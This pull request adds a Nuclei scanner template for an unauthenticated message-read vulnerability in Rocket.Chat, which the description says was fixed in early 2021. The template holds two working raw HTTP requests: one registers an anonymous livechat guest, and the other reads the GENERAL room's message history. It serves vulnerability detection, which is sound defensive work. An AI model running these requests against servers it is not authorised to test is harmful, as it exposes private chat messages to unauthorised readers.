### PR TITLE
Rocketchat Unauth message read vulnerabilities. 

### DIFF
--- a/vulnerabilities/rockethcat/unauth-message-read.yaml
+++ b/vulnerabilities/rockethcat/unauth-message-read.yaml
@@ -1,0 +1,42 @@
+id: rockethchat-unauth-access
+info:
+  name: RocketChat Unauthenticated Read Access
+  author: rojanrijal
+  severity: critical
+
+requests:
+  - raw:
+      - |
+        POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/json
+        User-Agent: Ophion SecurityGroup
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
+        {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}
+
+      - |
+        POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        Content-Type: application/json
+        User-Agent: Ophion SecurityGroup
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
+        {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '\"result\":{\"messages\"'
+        part: body


### PR DESCRIPTION
A critical security issue was found on Rocketchat on January 2021. This was fixed on 3.11, 3.10.5, 3.9.7, 3.8.8. 